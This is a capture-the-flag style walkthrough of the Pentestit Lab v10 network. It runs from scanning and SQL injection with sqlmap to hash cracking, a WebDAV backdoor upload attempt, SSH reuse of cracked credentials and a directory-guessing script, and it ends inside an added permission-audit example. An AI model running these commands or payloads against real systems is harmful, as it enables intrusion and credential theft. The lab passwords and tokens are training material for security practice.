PentestIt Lab v10

This time, I'm dealing with a network of hosts. Pentestit lab v10 to be exact. The network diagram looks pretty interesting.


After having connected to the VPN, I can only see the gateway to begin with. Let's start by checking out what kind of services are exposed.

[email protected]:~/Documents/pentestit# nmap -A -sV -p- -n -Pn -oA gwscan 192.168.101.9

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-03 10:33 EET
Nmap scan report for 192.168.101.9
Host is up (0.064s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
| ssh-hostkey: 
|   1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
|   2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
|_  256 2c:58:fd:06:ea:46:8e:f7:b5:28:58:58:06:fa:dc:38 (ECDSA)
25/tcp   open  smtp    CommuniGate Pro mail server 6.0.9
|_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection timeout
80/tcp   open  http    nginx 1.10.1
|_http-server-header: nginx/1.10.1
|_http-title: 403 Forbidden
443/tcp  open  http    nginx 1.2.1
|_http-server-header: nginx/1.2.1
|_http-title: Security Blog by GlobalDataSecurity
8100/tcp open  http    CommuniGate Pro httpd 6.0.9
| http-methods: 
|_  Potentially risky methods: PUT DELETE LOCK UNLOCK MKCOL PROPFIND PROPPATCH MOVE COPY REPORT SEARCH ACL MKCALENDAR
|_http-server-header: CommuniGatePro/6.0.9
|_http-svn-info: ERROR: Script execution failed (use -d to debug)
|_http-title:  CommuniGate Pro gds.lab Entrance
| http-webdav-scan: 
|   Server Date: Fri, 03 Feb 2017 08:35:23 GMT
|   WebDAV type: Unkown
|   Public Options: OPTIONS, GET, HEAD, POST, PUT, DELETE, LOCK, UNLOCK, MKCOL, PROPFIND, PROPPATCH, MOVE, COPY, REPORT, SEARCH, ACL, MKCALENDAR
|   Allowed Methods: OPTIONS, GET, HEAD, POST, PUT, DELETE, LOCK, UNLOCK, MKCOL, PROPFIND, PROPPATCH, MOVE, COPY, REPORT, SEARCH, ACL, MKCALENDAR
|   Server Type: CommuniGatePro/6.0.9
|   Directory Listing: 
|     /
|     /CalDAV/
|     /CalDAV/INBOX/
|     /CalDAV/Outbox/
|     /WebDAV/private/caldav/
|_    /CalDAV/Notify/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|firewall
Running (JUST GUESSING): Linux 3.X|2.6.X (91%), WatchGuard Fireware 11.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 3.2 - 3.8 (91%), Linux 3.5 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.2.0 (90%), Linux 3.8 (89%), Linux 3.1 - 3.2 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.0 - 3.2 (86%), Linux 2.6.32 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: Host: gds.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 25/tcp)
HOP RTT      ADDRESS
1   65.49 ms 10.10.0.1
2   66.25 ms 172.0.1.1
3   66.00 ms 192.168.101.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 235.09 seconds

Looking good so far. Let's start looking around. I check out that webserver first.


Ok that looks kind of wrong. JavaScript and templates seem to not have loaded. However, Burp shows something interesting.


So we need a hostname for it to work properly. I added "store.gds.lab" pointing at 192.168.101.9 in my /etc/hosts and tried again.


Now that's more like it. An eshop running opencart, I'll dig deeper here later.

Let's look around a bit more. So for the domain "gds.lab" we have subdomain "store" which is the name of one of the machines. Let's check if there is a dns server available.

[email protected]:~/Documents/pentestit# nmap -A -sU -p53 -n -Pn -oA gwscan 192.168.101.9

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-03 10:51 EET
Nmap scan report for 192.168.101.9
Host is up (0.069s latency).
PORT   STATE SERVICE VERSION
53/udp open  domain  ISC BIND (Fake version: 9.8.4-rpz2+rl005.12-P1)
| dns-nsid: 
|_  bind.version: 9.8.4-rpz2+rl005.12-P1
Too many fingerprints match this host to give specific OS details

So the DNS server is there. I just add the names of the other machines in a text file called "names" and look for records of those with a for loop.

[email protected]:~/Documents/pentestit# cat names 
cloud
ssh
mail
dev-store
store
site
ssh-test
WIN-DC0
blog
web-control
hall-of-fame
captcha
news
WIN-TERM
[email protected]:~/Documents/pentestit# for line in $(< names)
> do
> host -t a $line.gds.lab 192.168.101.9
> done
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

cloud.gds.lab has address 192.168.101.9
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host ssh.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host mail.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host dev-store.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

store.gds.lab has address 192.168.101.9
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host site.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host ssh-test.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host WIN-DC0.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host blog.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host web-control.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host hall-of-fame.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host captcha.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host news.gds.lab not found: 3(NXDOMAIN)
Using domain server:
Name: 192.168.101.9
Address: 192.168.101.9#53
Aliases: 

Host WIN-TERM.gds.lab not found: 3(NXDOMAIN)

From the output of this loop I know that cloud.gds.lab is also valid.


A local owncloud installation. Leaving that for the time being. I move on to the other ports. We also have port 443 open. Although when trying to connect...


Ok that's odd. Burp is confused and thinks there is no SSL there. Taking another look at the nmap, I notice something:

443/tcp  open  http    nginx 1.2.1
|_http-server-header: nginx/1.2.1
|_http-title: Security Blog by GlobalDataSecurity

Indeed it's HTTP not HTTPS. Let's take another look, this time at http://192.168.101.9:443/


There it is. Moving on to other ports. 8100 is the CommuniGate Web UI. I'll probably need some mails to connect to that. Although that blog gives me 2 mails already on the contact page. Noting those down for later.


Other than that, I decide to enumerate users from that smtp port that is open as well. For that I'll be using metasploit's smtp_enum module.

msf > use auxiliary/scanner/smtp/smtp_enum 
msf auxiliary(smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

   Name       Current Setting                                                Required  Description
   ----       ---------------                                                --------  -----------
   Proxies                                                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                    yes       The target address range or CIDR identifier
   RPORT      25                                                             yes       The target port (TCP)
   THREADS    1                                                              yes       The number of concurrent threads
   UNIXONLY   true                                                           yes       Skip Microsoft bannered servers when testing unix users
   USER_FILE  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  yes       The file that contains a list of probable users accounts.

msf auxiliary(smtp_enum) > set RHOSTS 192.168.101.9
RHOSTS => 192.168.101.9
msf auxiliary(smtp_enum) > run

[*] 192.168.101.9:25      - 192.168.101.9:25 Banner: 220 gds.lab ESMTP CommuniGate Pro 6.0.9 is glad to see you!
[+] 192.168.101.9:25      - 192.168.101.9:25 Users found: postmaster
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So using the default wordlist that comes with the module I was able to identify another email: [email protected]. Wrapping it up, I have 3 mails so far.


Also, it looks like they are using their own Pronto version. Looking a bit closer at the app download links, the android app is located in a subdirectory called "gds.lab".

Grabbing a copy of that, it might be interesting later on.

[email protected]:~/Documents/pentestit# wget http://192.168.101.9:8100/SkinFiles/gds.lab/Viewpoint/pronto.apk
--2017-02-03 12:38:59--  http://192.168.101.9:8100/SkinFiles/gds.lab/Viewpoint/pronto.apk
Connecting to 192.168.101.9:8100... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2362437 (2.3M) [application/vnd.android.package-archive]
Saving to: ‘pronto.apk’

pronto.apk                100%[==================================>]   2.25M   127KB/s    in 8.5s    

2017-02-03 12:39:08 (271 KB/s) - ‘pronto.apk’ saved [2362437/2362437]

At this point, I leave intruder running on those mails. Using a medium size list of passwords (only using 1 thread in order not to stress the service).


While this is running, I take a closer look at the blog site since that's the one that's custom.

By throwing 1 quote and then 2 quotes on the id parameter of the posts I get the feeling of an injection, though some filtering might be in place. That's true until I try random cases.


The above query doesn't return anything when 2=1 so I'm dealing with a boolean blind sqli. Firing up Sqlmap for this case, and proxying it through Burp for better insight.

[email protected]:~/Documents/pentestit# sqlmap -u "http://192.168.101.9:443/post.php?id=1" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" --risk=3 --level=5 -p id --tamper=randomcase -t B --proxy=http://127.0.0.1:8080
...
OUTPUT OMITTED
...
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 134 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 6973=6973-- uwZr

    Type: UNION query
    Title: Generic UNION query (random number) - 2 columns
    Payload: id=-7676') UNION ALL SELECT 8145,CONCAT(0x717a786a71,0x6f4e696e4a516a7159574a4476655147614a73554f4377734a79557845576b565159697a57666b41,0x7162787a71)-- TGyb
---
[16:38:29] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[16:38:29] [INFO] testing MySQL
[16:38:29] [INFO] confirming MySQL
[16:38:30] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Nginx
back-end DBMS: MySQL >= 5.0.0
[16:38:30] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.101.9'

[*] shutting down at 16:38:30

Fine so far. Now let's start grabbing some data. At this point I'm not able to retrieve data with sqlmap and Burp proxy history comes to the rescue to show me why.

Because of the randomcase tamper script, there are cases where certain strings don't actually get a different case, and that confuses sqlmap. For example, ORD might actually be changed to ORd, but OR is still an SQL word, and that messes up the data retrieval.
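
Why a keyword blacklist does not fix this injection, and what does, shown as an added example that is not the blog's code. The real application is PHP on MySQL; this sketch uses Python's sqlite3, and the filter, table and function names are assumptions made for illustration.

```python
import re
import sqlite3

# Constructed stand-in for the blog's filter: it rejects SQL keywords only
# when they appear in all-upper or all-lower spelling (assumption).
BLOCKED = ("UNION", "SELECT", "AND", "OR")


def make_db():
    """In-memory database with one constructed post."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO posts VALUES (1, 'First post')")
    return db


def passes_blacklist(value):
    """Substring match on exact-case keywords, the weak control under test."""
    return not any(k in value or k.lower() in value for k in BLOCKED)


def get_post_vulnerable(db, raw_id):
    """Blacklist plus string concatenation: the input still becomes SQL."""
    if not passes_blacklist(raw_id):
        return None
    sql = "SELECT title FROM posts WHERE id=('" + raw_id + "')"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def get_post_safe(db, raw_id):
    """Allow-list the expected type, then bind the value as a parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None
    row = db.execute(
        "SELECT title FROM posts WHERE id = ?", (int(raw_id),)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # Constructed inputs in the shape of the payload sqlmap reported.
    for raw in ("1", "1') AND 1=1-- ", "1') AnD 1=1-- ", "1') AnD 1=2-- "):
        print(repr(raw), get_post_vulnerable(db, raw), get_post_safe(db, raw))
    # Substring matching also rejects harmless text that contains a keyword,
    # which is the ORd/OR effect described above.
    print(passes_blacklist("ORd(x)"))
```

The vulnerable function answers differently for the true and false mixed-case conditions, which is the boolean oracle; the parameterized function returns nothing for both because the input never reaches the SQL parser as code.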

Through Burp and its match & replace rules I make certain changes.


And now with these in place, I'm able to retrieve data.

[email protected]:~/Documents/pentestit# sqlmap -u "http://192.168.101.9:443/post.php?id=1" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" -p id --tamper=randomcase -t B --proxy=http://127.0.0.1:8080 --dbs
...
OUTPUT OMITTED
...
available databases [2]:
[*] `information_schema`
[*] site

At this point, bruteforcing the mail has finished and nothing has come up.

Focusing on the sqli, by retrieving --is-dba, --current-user and --current-db I know that the user I'm using is not privileged, and it's a simple "[email protected]" account. Also, the current database is "site", so I'm dumping the contents to see what I can find.

Database "site" contained 2 tables, "posts" and "users". The first one well, doesn't contain anything interesting other than the content of the site. The second one however...

[email protected]:~/Documents/pentestit# sqlmap -u "http://192.168.101.9:443/post.php?id=1" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" -p id --tamper=randomcase -t B --proxy=http://127.0.0.1:8080 -D site --dump
...
OUTPUT OMITTED
...
Database: site
Table: users
[1 entry]
+----+-----------+------------------------------------+
| id | username  | password                           |
+----+-----------+------------------------------------+
| 1  | e.lindsey | $1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8. |
+----+-----------+------------------------------------+

Next step is cracking this password. Feeding this into a file and then to john...

[email protected]:~/Documents/pentestit# john --wordlist:/usr/share/wordlists/rockyou.txt hash 
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
lindsey123       (e.lindsey)
1g 0:00:00:02 DONE (2017-02-06 11:07) 0.4032g/s 32941p/s 32941c/s 32941C/s linny..lilolilo
Use the "--show" option to display all of the cracked passwords reliably
Session completed

That was easy. So e.lindsey's password is lindsey123. But for what?

First thing I try, is checking if there is some admin interface for this blog since well, I have some kind of credentials for it. Simply throwing /admin on the url is revealing.


That's the admin interface of the "site". Simply trying to log in with the former credentials reveals the first token for the "site" box.


After that, I try logging in the webmail on port 8100 with the account [email protected] and the password found. And I'm in.


From the "Compose" page I check out the user's address book and I'm able to grab some more emails. Some are on the same domain and some others aren't. The ones on the same domain are:

"Alfred Modlin" - [email protected]
"Emanuel Lindsey" - [email protected]
"none" - [email protected]
"Joshua Wise" - [email protected]
"Scott Locklear" - [email protected]

And the ones not on that domain are:

"Anna Byrns" - [email protected]
"Alex Fox" - [email protected]
"Amy Lock" - [email protected]
"B. Trokin" - [email protected]
"Dean Rivers" - [email protected]
"Emanuel Lindsey" - [email protected]
"E. Vasilyev" - [email protected]
"Harry Farris" - [email protected]
"Jerry Burris" - [email protected]
"Martin Ismail" - [email protected]
"Michael Minter" - [email protected]
"M. Sopov" - [email protected]
"Micheal Wessel" - [email protected]
"none" - [email protected]
"none" - [email protected]
"none" - [email protected]
"Raymond Black" - [email protected]
"Ron Dossett" - [email protected]
"Sara Ramos" - [email protected]
"Vivian Nix" - [email protected]
"Wm Moran" - [email protected]
"Wilfred Phillips" - [email protected]

Plus, 2 more domains other than the one already known ("gds.lab"): "mail.g-security.lab" and "s-lab.test". Both of which result in a refusal from the dns server when I ask for them externally.

[email protected]:~/Documents/pentestit# nslookup mail.g-security.lab 192.168.101.9
Server:  192.168.101.9
Address: 192.168.101.9#53

** server can't find mail.g-security.lab: REFUSED

[email protected]:~/Documents/pentestit# nslookup s-lab.test 192.168.101.9
Server:  192.168.101.9
Address: 192.168.101.9#53

** server can't find s-lab.test: REFUSED

With those credentials, I try to see if I can get any serverside execution by uploading files to the WebDAV but the server does not support execution even though I tried using the chexec functionality.

[email protected]:~/Documents/pentestit/scans# davtest -url http://192.168.101.9:8100/WebDAV/ -auth e.lindsey:lindsey123 --uploadfile ../simple-backdoor.php\;.png --uploadloc /test.php\;.png
********************************************************
 Testing DAV connection
OPEN  SUCCEED:  http://192.168.101.9:8100/WebDAV
********************************************************
 unless  Uploading file
Upload succeeded: http://192.168.101.9:8100/WebDAV//test.php;.png


Can't find anything else in Communigate web ui for the time being, with this user at least. Let's see however if these credentials are good anywhere else.

[email protected]:~/Documents/pentestit# ssh [email protected]
[email protected]'s password: 
Linux tl10-ssh 3.2.0-4-amd64 #1 SMP Debian 3.2.82-1 x86_64
Last login: Mon Feb  6 13:23:16 2017 from 10.10.37.34
[email protected]:~$

The credentials were good for ssh. Now it's time to enumerate this box. I'll just use LinEnum.sh.

[email protected]:/tmp$ ./.linenum.sh -t > .enumed.txt

[email protected]:~/Documents/pentestit# scp [email protected]:/tmp/.enumed.txt ./enumed.txt
[email protected]'s password: 
.enumed.txt                                               100%   30KB 195.6KB/s   00:00

From inside the /tmp folder since I don't have permissions to write in e.lindsey's directory, I run the script, dump the output in a file, and then just grab the file with the results with scp locally.

From the results, the IP of the box points to the fact that I am in the box called SSH (IP: 172.16.0.8) so I know where my foothold is.

Network & IP info:
eth0      Link encap:Ethernet  HWaddr 08:00:27:a5:fa:cf  
          inet addr:172.16.0.8  Bcast:172.16.0.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fea5:facf/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:377921 errors:0 dropped:0 overruns:0 frame:0
          TX packets:448123 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:113776859 (108.5 MiB)  TX bytes:121521451 (115.8 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:20 errors:0 dropped:0 overruns:0 frame:0
          TX packets:20 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1476 (1.4 KiB)  TX bytes:1476 (1.4 KiB)

Also, an interesting thing is the listening ports of the machine.

Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -               
tcp        0      0 172.16.0.8:53           0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -               
tcp        0      0 172.16.0.8:22           10.10.178.222:56132     ESTABLISHED -               
tcp        0      0 172.16.0.8:22           10.10.37.34:39974       ESTABLISHED -               
tcp        0      0 172.16.0.8:22           10.10.143.66:60110      ESTABLISHED -               
tcp        0      0 172.16.0.8:22           10.10.112.246:58454     ESTABLISHED -               
tcp        0      0 172.16.0.8:22           10.10.224.130:59736     ESTABLISHED -               
tcp        0      1 172.16.0.8:49962        54.246.133.196:443      SYN_SENT    8195/python     
tcp        0      0 172.16.0.8:22           10.10.178.222:56202     ESTABLISHED -               
tcp        0      1 172.16.0.8:49946        54.246.133.196:443      SYN_SENT    8195/python     
tcp6       0      0 ::1:953                 :::*                    LISTEN      -           

From that, I can make out that there is a webserver running on the box. While browsing through the results, I also notice the following:

Files not owned by user but writable by group:
-rwxrwxrwx 1 root root 1192 Oct  6 15:51 /opt/upload/admin/config.php
-rwxrwxrwx 1 root root 1027 Oct  6 15:51 /opt/upload/config.php
-rwxrwxrwx 1 root root 1098 Oct 19 17:58 /var/www/admin/config.php
-rwxrwxrwx 1 root root 946 Oct 19 17:38 /var/www/config.php
-rwxrwxrwx 1 www-data adm 4297 Nov 27 06:12 /var/log/nginx/error.log.1

Some very interesting files are accessible. These files seem to be the config files of Opencart, including db credentials, local folder structure of the store etc. This could be some kind of local installation of the store only accessible from within the network for whatever purposes.

<?php
// HTTP
define('HTTP_SERVER', 'http://store.gds.lab/admin/');
define('HTTP_CATALOG', 'http://store.gds.lab/');

// HTTPS
define('HTTPS_SERVER', 'http://store.gds.lab/admin/');
define('HTTPS_CATALOG', 'http://store.gds.lab/');

// DIR
define('DIR_APPLICATION', '/var/www/admin/');
define('DIR_SYSTEM', '/var/www/system/');
define('DIR_IMAGE', '/var/www/image/');
define('DIR_LANGUAGE', '/var/www/admin/language/');
define('DIR_TEMPLATE', '/var/www/admin/view/template/');
define('DIR_CONFIG', '/var/www/system/config/');
define('DIR_CACHE', '/var/www/system/storage/cache/');
define('DIR_DOWNLOAD', '/var/www/system/storage/download/');
define('DIR_LOGS', '/var/www/system/storage/logs/');
define('DIR_MODIFICATION', '/var/www/system/storage/modification/');
define('DIR_UPLOAD', '/var/www/system/storage/upload/');
define('DIR_CATALOG', '/var/www/catalog/');

// DB
define('DB_DRIVER', 'mysqli');
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'dbuser');
define('DB_PASSWORD', 'dfs8g^Ehsd');
define('DB_DATABASE', 'testlab');
define('DB_PORT', '3306');
define('DB_PREFIX', 'oc_');

Now having the database credentials for the application, I log into the database, and start looking for other credentials or anything useful.

[email protected]:/var/www$ mysql -u dbuser -h localhost -D testlab -p
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.5.53-0+deb7u1 (Debian)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> SELECT user_id,username,password,salt,firstname,lastname,email FROM oc_user;
+---------+----------+------------------------------------------+-----------+-----------------------+----------+-----------------------+
| user_id | username | password                                 | salt      | firstname             | lastname | email                 |
+---------+----------+------------------------------------------+-----------+-----------------------+----------+-----------------------+
|       1 | admin    | 652995927a552617aeed8ecf844b6f6af4760a15 | J3Wgm5mbC | John                  | Doe      | [email protected]     |
|       2 | admin2   | e2180c9ab794460fe1338bfc28b4e8015edb7777 | e9c180b5c | [email protected] |          | [email protected] |
+---------+----------+------------------------------------------+-----------+-----------------------+----------+-----------------------+

Next step: putting these in a file and feeding that file to john to see if it comes up with anything. Also, I'll have to use a custom opencart format because opencart uses its own hashing function according to this.

[email protected]:~/Documents/pentestit# cat opencarthashes 
admin:652995927a552617aeed8ecf844b6f6af4760a15$J3Wgm5mbC
admin2:e2180c9ab794460fe1338bfc28b4e8015edb7777$e9c180b5c
[email protected]:~/Documents/pentestit# ../../Tools/JohnTheRipper/run/john -form=dynamic='sha1($s.sha1($s.sha1($p)))' opencarthashes --wordlist:/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (dynamic=sha1($s.sha1($s.sha1($p))) [128/128 AVX 4x1])
Press 'q' or Ctrl-C to abort, almost any other key for status
admin            (admin2)
1g 0:00:00:06 DONE (2017-02-06 18:03) 0.1610g/s 2309Kp/s 2313Kc/s 2313KC/s !(3([email protected] * 7¡Vamos! 
Use the "--show" option to display all of the cracked passwords reliably
Session completed
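
The hash format passed to john above, written out and paired with a rehash-on-login upgrade to a slow KDF, as an added example that is not OpenCart's code. The row is the admin2 entry from the table above; the function names, the record layout and the PBKDF2 iteration count are assumptions.

```python
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # assumption: tune to the hardware in use
PREFIX = "pbkdf2_sha256$"


def sha1_hex(text):
    """SHA-1 of a string as lowercase hex, as PHP's sha1() returns it."""
    return hashlib.sha1(text.encode("utf-8")).hexdigest()


def opencart_legacy_hash(password, salt):
    """sha1($s.sha1($s.sha1($p))): three fast hashes, hence the quick crack."""
    return sha1_hex(salt + sha1_hex(salt + sha1_hex(password)))


def verify_legacy(password, salt, stored):
    """Constant-time comparison against the stored legacy digest."""
    return hmac.compare_digest(opencart_legacy_hash(password, salt), stored)


def pbkdf2_record(password):
    """New-style record: scheme, iteration count, random salt, derived key."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
    )
    return "%s%d$%s$%s" % (PREFIX, PBKDF2_ITERATIONS, salt.hex(), key.hex())


def verify_pbkdf2(password, record):
    """Recompute the key with the stored parameters and compare."""
    _scheme, iterations, salt_hex, key_hex = record.split("$")
    key = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"),
        bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(key.hex(), key_hex)


def login(password, user):
    """Check the password; upgrade a legacy row once it verifies."""
    if user["password"].startswith(PREFIX):
        return verify_pbkdf2(password, user["password"])
    if verify_legacy(password, user["salt"], user["password"]):
        # The plaintext is only available at login, so upgrade here.
        user["password"] = pbkdf2_record(password)
        user["salt"] = ""
        return True
    return False


if __name__ == "__main__":
    # admin2 row as shown in the oc_user table above.
    row = {
        "username": "admin2",
        "password": "e2180c9ab794460fe1338bfc28b4e8015edb7777",
        "salt": "e9c180b5c",
    }
    print(login("admin", row), row["password"][:20])
```

Rows that never log in again stay in the legacy format, so a migration like this is normally paired with a forced reset for stale accounts.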

At this point I take a step back to look a bit at the box and its filesystem. While browsing, I find the following directory.

[email protected]:/tmp$ cd /data
[email protected]:/data$ ls
users
[email protected]:/data$ cd users
[email protected]:/data/users$ ls
ls: cannot open directory .: Permission denied
[email protected]:/data/users$

From the looks of it, I cannot access the directory, or more specifically I cannot see its contents. Time for a bit of bruteforce. Keeping in mind that the immediate folder is that of a user, and then some other folder, I write the following script to automate the process.

import os
from string import ascii_lowercase
from itertools import product

# Candidate usernames whose directories are probed
users = ['a.modlin', 'e.lindsey', 'g.leone', 'k.barth', 'm.howard', 'rross', 's.locklear']

# Try every lowercase name of length 1 to 4 under each user's directory
for length in range(1, 5):
    keywords = [''.join(i) for i in product(ascii_lowercase, repeat=length)]
    for user in users:
        for word in keywords:
            path = os.path.join('/data/users', user, word)
            # The directory cannot be listed, but an existing path can still be checked
            if os.path.exists(path):
                print(path)

I run this little script and soon enough some valid directories start popping up.

[email protected]:/tmp/.test$ python dirfinder.py 
/data/users/a.modlin/tmp
/data/users/rross/tmp
/data/users/s.locklear/tmp
/data/users/a.modlin/docs
/data/users/rross/docs
/data/users/s.locklear/docs

Looking into these folders one by one. At some point I find the following.

e[email protected]:/tmp/.test$ cd /data/users/rross
[email protected]:/data/users/rross$ cd docs
[email protected]:/data/users/rross/docs$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Nov 25 15:43 .
drwxr-x--x 4 root root 4096 Nov 25 15:15 ..
-rw----r-- 1 root root 1675 Nov 25 15:17 keys
-rw-r--r-- 1 root root    9 Nov 25 15:43 token.txt
[email protected]:/data/users/rross/docs$ cat token.txt 
miaM3aib
[email protected]:/data/users/rross/docs$ cat keys 
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----

Another token - "ssh" box down! And a private key. Grabbing a copy of that too locally. So I now have a private ssh key for rross (probably). I'm thinking about focusing on the "ssh-test" box.
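
A permission audit for the weaknesses used on this box: directories that can be entered but not listed, a private key readable by "other", and world-writable files such as the config.php entries listed earlier. This is an added example, not part of the original write-up; the function names and the sample tree are constructed, with modes copied from the listings above.

```python
import os
import stat
import tempfile


def looks_like_private_key(path):
    """True if the file starts with a PEM header naming a private key."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(64)
    except OSError:
        return False
    return head.startswith(b"-----BEGIN") and b"PRIVATE KEY" in head


def audit_tree(root):
    """Return sorted (issue, path) findings based on the 'other' mode bits."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        mode = os.stat(dirpath).st_mode
        # Traverse-only directory: others may enter (x) but not list (r),
        # so anything beneath it is protected only by an unguessed name.
        hidden_listing = bool(mode & stat.S_IXOTH) and not mode & stat.S_IROTH
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            if hidden_listing and st.st_mode & (stat.S_IROTH | stat.S_IXOTH):
                findings.append(("reachable-by-guessing", path))
            if stat.S_ISREG(st.st_mode):
                if st.st_mode & stat.S_IWOTH:
                    findings.append(("world-writable", path))
                if st.st_mode & stat.S_IROTH and looks_like_private_key(path):
                    findings.append(("world-readable-private-key", path))
    return sorted(findings)


def build_sample_tree(base):
    """Constructed layout using the modes from the listings above."""
    docs = os.path.join(base, "users", "rross", "docs")
    www = os.path.join(base, "www")
    os.makedirs(docs)
    os.makedirs(www)
    files = {
        os.path.join(docs, "keys"):
            (b"-----BEGIN RSA PRIVATE KEY-----\nconstructed placeholder\n", 0o604),
        os.path.join(docs, "token.txt"): (b"constructed\n", 0o644),
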